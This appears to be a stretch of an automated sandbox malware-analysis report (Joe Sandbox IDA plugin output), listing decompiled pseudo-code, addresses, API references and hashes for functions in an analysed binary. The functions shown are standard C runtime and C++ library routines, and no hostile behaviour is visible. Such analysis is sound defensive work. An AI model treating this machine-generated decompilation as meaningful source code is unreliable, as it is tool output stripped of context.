                                                                                                                                    			}










                                                                                                                                    0x0040c4e7
                                                                                                                                    0x0040c4f3
                                                                                                                                    0x0040c4f8
                                                                                                                                    0x0040c517
                                                                                                                                    0x0040c51e
                                                                                                                                    0x0040c525
                                                                                                                                    0x0040c52a
                                                                                                                                    0x0040c52a
                                                                                                                                    0x0040c52a
                                                                                                                                    0x00000000
                                                                                                                                    0x0040c4fa
                                                                                                                                    0x0040c4fa
                                                                                                                                    0x0040c4ff
                                                                                                                                    0x0040c52c
                                                                                                                                    0x0040c52c
                                                                                                                                    0x0040c52f
                                                                                                                                    0x0040c501
                                                                                                                                    0x0040c506
                                                                                                                                    0x00409ce7
                                                                                                                                    0x00409ce9
                                                                                                                                    0x00409cee
                                                                                                                                    0x00409cf8
                                                                                                                                    0x00409cfd
                                                                                                                                    0x00409cff
                                                                                                                                    0x00409d03
                                                                                                                                    0x00409d0e
                                                                                                                                    0x00409d0e
                                                                                                                                    0x00409d1f
                                                                                                                                    0x00409d1f
                                                                                                                                    0x0040c4ff

                                                                                                                                    APIs
                                                                                                                                    • __getptd.LIBCMT ref: 0040C501
                                                                                                                                      • Part of subcall function 0040DABC: __getptd_noexit.LIBCMT ref: 0040DABF
                                                                                                                                      • Part of subcall function 0040DABC: __amsg_exit.LIBCMT ref: 0040DACC
                                                                                                                                    • __getptd.LIBCMT ref: 0040C512
                                                                                                                                    • __getptd.LIBCMT ref: 0040C520
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                    • String ID: MOC$csm
                                                                                                                                    • API String ID: 803148776-1389381023
                                                                                                                                    • Opcode ID: 696763e73bca0f996a450ff4f60a7d86387061f150657c841481db61ae13b64b
                                                                                                                                    • Instruction ID: 8492140aa3576cce36d668980d52ebd6f177bcae2a2a1f922aa9b7e3a5f58d3c
                                                                                                                                    • Opcode Fuzzy Hash: 696763e73bca0f996a450ff4f60a7d86387061f150657c841481db61ae13b64b
                                                                                                                                    • Instruction Fuzzy Hash: 15E01A75A141049FD710ABB5C486B2933E4EF49328F1902BAE408D73A3C73CE845995A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E004120A6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				signed int _t15;
                                                                                                                                    				LONG* _t21;
                                                                                                                                    				long _t23;
                                                                                                                                    				void* _t31;
                                                                                                                                    				LONG* _t33;
                                                                                                                                    				void* _t34;
                                                                                                                                    				void* _t35;
                                                                                                                                    
                                                                                                                                    				_t35 = __eflags;
                                                                                                                                    				_t29 = __edx;
                                                                                                                                    				_t25 = __ebx;
                                                                                                                                    				_push(0xc);
                                                                                                                                    				_push(0x41f168);
                                                                                                                                    				E0040EAC8(__ebx, __edi, __esi);
                                                                                                                                    				_t31 = E0040DABC(__ebx, __edx, _t35);
                                                                                                                                    				_t15 =  *0x4b3df8; // 0xfffffffe
                                                                                                                                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                    					E0040DFCF(_t25, _t31, 0xd);
                                                                                                                                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                    					_t33 =  *(_t31 + 0x68);
                                                                                                                                    					 *(_t34 - 0x1c) = _t33;
                                                                                                                                    					__eflags = _t33 -  *0x4b46d8; // 0x782bc8
                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                    						__eflags = _t33;
                                                                                                                                    						if(_t33 != 0) {
                                                                                                                                    							_t23 = InterlockedDecrement(_t33);
                                                                                                                                    							__eflags = _t23;
                                                                                                                                    							if(_t23 == 0) {
                                                                                                                                    								__eflags = _t33 - 0x4b42b0;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									_push(_t33);
                                                                                                                                    									E004098AA(_t25, _t31, _t33, __eflags);
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t21 =  *0x4b46d8; // 0x782bc8
                                                                                                                                    						 *(_t31 + 0x68) = _t21;
                                                                                                                                    						_t33 =  *0x4b46d8; // 0x782bc8
                                                                                                                                    						 *(_t34 - 0x1c) = _t33;
                                                                                                                                    						InterlockedIncrement(_t33);
                                                                                                                                    					}
                                                                                                                                    					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                    					E00412141();
                                                                                                                                    				} else {
                                                                                                                                    					_t33 =  *(_t31 + 0x68);
                                                                                                                                    				}
                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                    					E0040FCDF(_t29, 0x20);
                                                                                                                                    				}
                                                                                                                                    				return E0040EB0D(_t33);
                                                                                                                                    			}










                                                                                                                                    0x004120a6
                                                                                                                                    0x004120a6
                                                                                                                                    0x004120a6
                                                                                                                                    0x004120a6
                                                                                                                                    0x004120a8
                                                                                                                                    0x004120ad
                                                                                                                                    0x004120b7
                                                                                                                                    0x004120b9
                                                                                                                                    0x004120c1
                                                                                                                                    0x004120e2
                                                                                                                                    0x004120e8
                                                                                                                                    0x004120ec
                                                                                                                                    0x004120ef
                                                                                                                                    0x004120f2
                                                                                                                                    0x004120f8
                                                                                                                                    0x004120fa
                                                                                                                                    0x004120fc
                                                                                                                                    0x004120ff
                                                                                                                                    0x00412105
                                                                                                                                    0x00412107
                                                                                                                                    0x00412109
                                                                                                                                    0x0041210f
                                                                                                                                    0x00412111
                                                                                                                                    0x00412112
                                                                                                                                    0x00412117
                                                                                                                                    0x0041210f
                                                                                                                                    0x00412107
                                                                                                                                    0x00412118
                                                                                                                                    0x0041211d
                                                                                                                                    0x00412120
                                                                                                                                    0x00412126
                                                                                                                                    0x0041212a
                                                                                                                                    0x0041212a
                                                                                                                                    0x00412130
                                                                                                                                    0x00412137
                                                                                                                                    0x004120c9
                                                                                                                                    0x004120c9
                                                                                                                                    0x004120c9
                                                                                                                                    0x004120ce
                                                                                                                                    0x004120d2
                                                                                                                                    0x004120d7
                                                                                                                                    0x004120df

                                                                                                                                    APIs
                                                                                                                                    • __getptd.LIBCMT ref: 004120B2
                                                                                                                                      • Part of subcall function 0040DABC: __getptd_noexit.LIBCMT ref: 0040DABF
                                                                                                                                      • Part of subcall function 0040DABC: __amsg_exit.LIBCMT ref: 0040DACC
                                                                                                                                    • __amsg_exit.LIBCMT ref: 004120D2
                                                                                                                                    • __lock.LIBCMT ref: 004120E2
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004120FF
                                                                                                                                    • InterlockedIncrement.KERNEL32(00782BC8), ref: 0041212A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4271482742-0
                                                                                                                                    • Opcode ID: 2a5b37b606d2560efc8b66ddec526c9e5d794fa31dc7d1a9d45db52efac48b9c
                                                                                                                                    • Instruction ID: 91005f0ff36abc8f9298eac65bd369b21eec3d0130b518f9ed1efdc366216d17
                                                                                                                                    • Opcode Fuzzy Hash: 2a5b37b606d2560efc8b66ddec526c9e5d794fa31dc7d1a9d45db52efac48b9c
                                                                                                                                    • Instruction Fuzzy Hash: 4601E131E01611A7DB20EB6A990A78A77607F44720F05412BE910B3392C77C6DE1DBDD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                    			E004098AA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				intOrPtr* _t10;
                                                                                                                                    				intOrPtr _t13;
                                                                                                                                    				intOrPtr _t23;
                                                                                                                                    				void* _t25;
                                                                                                                                    
                                                                                                                                    				_push(0xc);
                                                                                                                                    				_push(0x41edb0);
                                                                                                                                    				_t8 = E0040EAC8(__ebx, __edi, __esi);
                                                                                                                                    				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                    					L9:
                                                                                                                                    					return E0040EB0D(_t8);
                                                                                                                                    				}
                                                                                                                                    				if( *0x610918 != 3) {
                                                                                                                                    					_push(_t23);
                                                                                                                                    					L7:
                                                                                                                                    					if(HeapFree( *0x60ec40, 0, ??) == 0) {
                                                                                                                                    						_t10 = E0040B128();
                                                                                                                                    						 *_t10 = E0040B0E6(GetLastError());
                                                                                                                                    					}
                                                                                                                                    					goto L9;
                                                                                                                                    				}
                                                                                                                                    				E0040DFCF(__ebx, __edi, 4);
                                                                                                                                    				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                    				_t13 = E0040E002(_t23);
                                                                                                                                    				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                    					_push(_t23);
                                                                                                                                    					_push(_t13);
                                                                                                                                    					E0040E032();
                                                                                                                                    				}
                                                                                                                                    				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                                    				_t8 = E00409900();
                                                                                                                                    				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                                    					goto L9;
                                                                                                                                    				} else {
                                                                                                                                    					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                                    					goto L7;
                                                                                                                                    				}
                                                                                                                                    			}







                                                                                                                                    0x004098aa
                                                                                                                                    0x004098ac
                                                                                                                                    0x004098b1
                                                                                                                                    0x004098b6
                                                                                                                                    0x004098bb
                                                                                                                                    0x00409932
                                                                                                                                    0x00409937
                                                                                                                                    0x00409937
                                                                                                                                    0x004098c4
                                                                                                                                    0x00409909
                                                                                                                                    0x0040990a
                                                                                                                                    0x0040991a
                                                                                                                                    0x0040991c
                                                                                                                                    0x0040992f
                                                                                                                                    0x00409931
                                                                                                                                    0x00000000
                                                                                                                                    0x0040991a
                                                                                                                                    0x004098c8
                                                                                                                                    0x004098ce
                                                                                                                                    0x004098d3
                                                                                                                                    0x004098d9
                                                                                                                                    0x004098de
                                                                                                                                    0x004098e0
                                                                                                                                    0x004098e1
                                                                                                                                    0x004098e2
                                                                                                                                    0x004098e8
                                                                                                                                    0x004098e9
                                                                                                                                    0x004098f0
                                                                                                                                    0x004098f9
                                                                                                                                    0x00000000
                                                                                                                                    0x004098fb
                                                                                                                                    0x004098fb
                                                                                                                                    0x00000000
                                                                                                                                    0x004098fb

                                                                                                                                    APIs
                                                                                                                                    • __lock.LIBCMT ref: 004098C8
                                                                                                                                      • Part of subcall function 0040DFCF: __mtinitlocknum.LIBCMT ref: 0040DFE5
                                                                                                                                      • Part of subcall function 0040DFCF: __amsg_exit.LIBCMT ref: 0040DFF1
                                                                                                                                      • Part of subcall function 0040DFCF: EnterCriticalSection.KERNEL32(?,?,?,00412DB9,00000004,0041F1A8,0000000C,0040B010,?,?,00000000,00000000,00000000,?,0040DA6E,00000001), ref: 0040DFF9
                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 004098D3
                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 004098E2
                                                                                                                                    • HeapFree.KERNEL32(00000000,?,0041EDB0,0000000C,0040DFB0,00000000,0041F0C8,0000000C,0040DFEA,?,?,?,00412DB9,00000004,0041F1A8,0000000C), ref: 00409912
                                                                                                                                    • GetLastError.KERNEL32(?,00412DB9,00000004,0041F1A8,0000000C,0040B010,?,?,00000000,00000000,00000000,?,0040DA6E,00000001,00000214), ref: 00409923
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2714421763-0
                                                                                                                                    • Opcode ID: a3432ff2f2c0d623ae391fcc5ce48b876a3146fcd5354f0c293f27ccade7b79d
                                                                                                                                    • Instruction ID: f8c9f4db22bee1a2e67d6c0ae80cd181b6f7a081d9e5ad191f908558f97498db
                                                                                                                                    • Opcode Fuzzy Hash: a3432ff2f2c0d623ae391fcc5ce48b876a3146fcd5354f0c293f27ccade7b79d
                                                                                                                                    • Instruction Fuzzy Hash: 5501A771945215ABDB246FB29C0A75E3764AF01724F10843FF1117A2D2DA7C9D50CA9C
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 19%
                                                                                                                                    			E0040CB58(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                    				void* __ebp;
                                                                                                                                    				void* _t20;
                                                                                                                                    				void* _t22;
                                                                                                                                    				void* _t23;
                                                                                                                                    				intOrPtr* _t25;
                                                                                                                                    				void* _t26;
                                                                                                                                    				void* _t27;
                                                                                                                                    
                                                                                                                                    				_t26 = __esi;
                                                                                                                                    				_t25 = __edi;
                                                                                                                                    				_t22 = __ebx;
                                                                                                                                    				_t29 = _a20;
                                                                                                                                    				if(_a20 != 0) {
                                                                                                                                    					_push(_a20);
                                                                                                                                    					_push(__ebx);
                                                                                                                                    					_push(__esi);
                                                                                                                                    					_push(_a4);
                                                                                                                                    					E0040CAC6(__ebx, __edi, __esi, _t29);
                                                                                                                                    					_t27 = _t27 + 0x10;
                                                                                                                                    				}
                                                                                                                                    				_t30 = _a28;
                                                                                                                                    				_push(_a4);
                                                                                                                                    				if(_a28 != 0) {
                                                                                                                                    					_push(_a28);
                                                                                                                                    				} else {
                                                                                                                                    					_push(_t26);
                                                                                                                                    				}
                                                                                                                                    				E00409404(_t23);
                                                                                                                                    				_push( *_t25);
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_t26);
                                                                                                                                    				E0040C530(_t22, _t25, _t26, _t30);
                                                                                                                                    				_push(0x100);
                                                                                                                                    				_push(_a24);
                                                                                                                                    				_push(_a16);
                                                                                                                                    				 *((intOrPtr*)(_t26 + 8)) =  *((intOrPtr*)(_t25 + 4)) + 1;
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_t26);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_t20 = E0040C7AB( *((intOrPtr*)(_t22 + 0xc)));
                                                                                                                                    				if(_t20 != 0) {
                                                                                                                                    					E004093CB(_t20, _t26);
                                                                                                                                    					return _t20;
                                                                                                                                    				}
                                                                                                                                    				return _t20;
                                                                                                                                    			}










                                                                                                                                    0x0040cb58
                                                                                                                                    0x0040cb58
                                                                                                                                    0x0040cb58
                                                                                                                                    0x0040cb5d
                                                                                                                                    0x0040cb61
                                                                                                                                    0x0040cb63
                                                                                                                                    0x0040cb66
                                                                                                                                    0x0040cb67
                                                                                                                                    0x0040cb68
                                                                                                                                    0x0040cb6b
                                                                                                                                    0x0040cb70
                                                                                                                                    0x0040cb70
                                                                                                                                    0x0040cb73
                                                                                                                                    0x0040cb77
                                                                                                                                    0x0040cb7a
                                                                                                                                    0x0040cb7f
                                                                                                                                    0x0040cb7c
                                                                                                                                    0x0040cb7c
                                                                                                                                    0x0040cb7c
                                                                                                                                    0x0040cb82
                                                                                                                                    0x0040cb87
                                                                                                                                    0x0040cb89
                                                                                                                                    0x0040cb8c
                                                                                                                                    0x0040cb8f
                                                                                                                                    0x0040cb90
                                                                                                                                    0x0040cb98
                                                                                                                                    0x0040cb9d
                                                                                                                                    0x0040cba1
                                                                                                                                    0x0040cba4
                                                                                                                                    0x0040cba7
                                                                                                                                    0x0040cbad
                                                                                                                                    0x0040cbae
                                                                                                                                    0x0040cbb1
                                                                                                                                    0x0040cbbb
                                                                                                                                    0x0040cbbf
                                                                                                                                    0x00000000
                                                                                                                                    0x0040cbbf
                                                                                                                                    0x0040cbc5

                                                                                                                                    APIs
                                                                                                                                    • ___BuildCatchObject.LIBCMT ref: 0040CB6B
                                                                                                                                      • Part of subcall function 0040CAC6: ___BuildCatchObjectHelper.LIBCMT ref: 0040CAFC
                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 0040CB82
                                                                                                                                    • ___FrameUnwindToState.LIBCMT ref: 0040CB90
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                    • String ID: csm
                                                                                                                                    • API String ID: 2163707966-1018135373
                                                                                                                                    • Opcode ID: ec09eb294149d6937646b9702694b7f821a915241edb19366a771b096ad2dd0a
                                                                                                                                    • Instruction ID: 3af83c646faaa93cbfda27f64ea33f51be2b23986fd09bd6acfdca562aa1f799
                                                                                                                                    • Opcode Fuzzy Hash: ec09eb294149d6937646b9702694b7f821a915241edb19366a771b096ad2dd0a
                                                                                                                                    • Instruction Fuzzy Hash: E501E872000109FBDF125F51DC86EAB7F6AEF48354F044226BD18251A1D73AA972DBA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E00405CE1(intOrPtr __ecx) {
                                                                                                                                    				intOrPtr _t11;
                                                                                                                                    				void* _t20;
                                                                                                                                    				intOrPtr _t21;
                                                                                                                                    				void* _t23;
                                                                                                                                    
                                                                                                                                    				E004097B4(E0041C135, _t23);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_t21 = __ecx;
                                                                                                                                    				 *((intOrPtr*)(_t23 - 0x10)) = __ecx;
                                                                                                                                    				 *((intOrPtr*)(__ecx)) = 0x401464;
                                                                                                                                    				E00408DB1(__ecx + 4);
                                                                                                                                    				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
                                                                                                                                    				if(E004097EE(4, _t20) == 0) {
                                                                                                                                    					_t11 = 0;
                                                                                                                                    				} else {
                                                                                                                                    					_t11 = E0040447C(_t10);
                                                                                                                                    				}
                                                                                                                                    				 *((intOrPtr*)(_t21 + 0x38)) = _t11;
                                                                                                                                    				E004052E8(_t21);
                                                                                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
                                                                                                                                    				return _t21;
                                                                                                                                    			}







                                                                                                                                    0x00405ce6
                                                                                                                                    0x00405ceb
                                                                                                                                    0x00405ced
                                                                                                                                    0x00405cf2
                                                                                                                                    0x00405cf5
                                                                                                                                    0x00405cfb
                                                                                                                                    0x00405d00
                                                                                                                                    0x00405d0e
                                                                                                                                    0x00405d19
                                                                                                                                    0x00405d10
                                                                                                                                    0x00405d12
                                                                                                                                    0x00405d12
                                                                                                                                    0x00405d1d
                                                                                                                                    0x00405d20
                                                                                                                                    0x00405d2b
                                                                                                                                    0x00405d33

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00405CE6
                                                                                                                                    • std::_Mutex::_Mutex.LIBCPMT ref: 00405CFB
                                                                                                                                      • Part of subcall function 004097EE: _malloc.LIBCMT ref: 00409808
                                                                                                                                    • std::locale::locale.LIBCPMT ref: 00405D12
                                                                                                                                      • Part of subcall function 0040447C: std::locale::_Init.LIBCPMT ref: 0040447F
                                                                                                                                      • Part of subcall function 0040447C: std::locale::facet::_Incref.LIBCPMT ref: 0040448D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prologIncrefInitMutexMutex::__mallocstd::_std::locale::_std::locale::facet::_std::locale::locale
                                                                                                                                    • String ID: 7\@
                                                                                                                                    • API String ID: 3605895379-3199695311
                                                                                                                                    • Opcode ID: 158b30d1693d427ec20d833f3484cf3c5710e3f710cb0b0bf8ec5769b88d2816
                                                                                                                                    • Instruction ID: 1b757726bc53de689cd8871a4ed1c906e1dd8af3d6b50a8903106c5356d0d1e6
                                                                                                                                    • Opcode Fuzzy Hash: 158b30d1693d427ec20d833f3484cf3c5710e3f710cb0b0bf8ec5769b88d2816
                                                                                                                                    • Instruction Fuzzy Hash: A3F06571A20611DBCB18BFA5855579EB2E4EF44718F10493F6552F37C2DBBC98008B5D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E00408F98() {
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				void* _v28;
                                                                                                                                    				void* _v64;
                                                                                                                                    				void* _v104;
                                                                                                                                    				void* __esi;
                                                                                                                                    				void* _t17;
                                                                                                                                    				intOrPtr* _t19;
                                                                                                                                    				void* _t20;
                                                                                                                                    				void* _t21;
                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                    				void* _t24;
                                                                                                                                    
                                                                                                                                    				_push(0x44);
                                                                                                                                    				E0040B34A(E0041C489, _t17, _t20, _t21);
                                                                                                                                    				E004070B4(_t24 - 0x28, _t20, "invalid string position");
                                                                                                                                    				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
                                                                                                                                    				_t19 = _t24 - 0x50;
                                                                                                                                    				E00408F11(_t19, _t24 - 0x28);
                                                                                                                                    				E00409853(_t24 - 0x50, 0x41ed70);
                                                                                                                                    				asm("int3");
                                                                                                                                    				_push(_t24);
                                                                                                                                    				_push(_t21);
                                                                                                                                    				_push(_v16);
                                                                                                                                    				_t22 = _t19;
                                                                                                                                    				E0040711E(_t19);
                                                                                                                                    				 *_t22 = 0x40165c;
                                                                                                                                    				return _t22;
                                                                                                                                    			}














                                                                                                                                    0x00408f98
                                                                                                                                    0x00408f9f
                                                                                                                                    0x00408fac
                                                                                                                                    0x00408fb1
                                                                                                                                    0x00408fb9
                                                                                                                                    0x00408fbc
                                                                                                                                    0x00408fca
                                                                                                                                    0x00408fcf
                                                                                                                                    0x00408fd2
                                                                                                                                    0x00408fd5
                                                                                                                                    0x00408fd6
                                                                                                                                    0x00408fd9
                                                                                                                                    0x00408fdb
                                                                                                                                    0x00408fe0
                                                                                                                                    0x00408fea

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00408F9F
                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 00408FBC
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00408FCA
                                                                                                                                      • Part of subcall function 00409853: RaiseException.KERNEL32(?,?,00409852,?,?,?,?,?,00409852,?,0041E594,0060EBE4), ref: 00409895
                                                                                                                                      • Part of subcall function 0040711E: __EH_prolog.LIBCMT ref: 00407123
                                                                                                                                      • Part of subcall function 0040711E: std::exception::exception.LIBCMT ref: 00407134
                                                                                                                                    Strings
                                                                                                                                    • invalid string position, xrefs: 00408FA4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionException@8H_prologH_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                    • String ID: invalid string position
                                                                                                                                    • API String ID: 255094582-1799206989
                                                                                                                                    • Opcode ID: 8ff4e62d937e6fdcf6bb67b4896b92b7516b96df0c028d6ff5086f717caf4aef
                                                                                                                                    • Instruction ID: d487c7d2763de859476cd9326c51f6b4bbf273d60d2da766adc3642f95393ab3
                                                                                                                                    • Opcode Fuzzy Hash: 8ff4e62d937e6fdcf6bb67b4896b92b7516b96df0c028d6ff5086f717caf4aef
                                                                                                                                    • Instruction Fuzzy Hash: B8F0A076940208A7CB10FBD2CC02ECDB728AB20364F14443BF600771C2CBB99944C7AD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                    			E004070E5(void* __edi) {
                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                    				intOrPtr _t30;
                                                                                                                                    				intOrPtr* _t34;
                                                                                                                                    				void* _t36;
                                                                                                                                    
                                                                                                                                    				E004097B4(E0041C1D2, _t36);
                                                                                                                                    				E004070B4(_t36 - 0x28, __edi, "vector<T> too long");
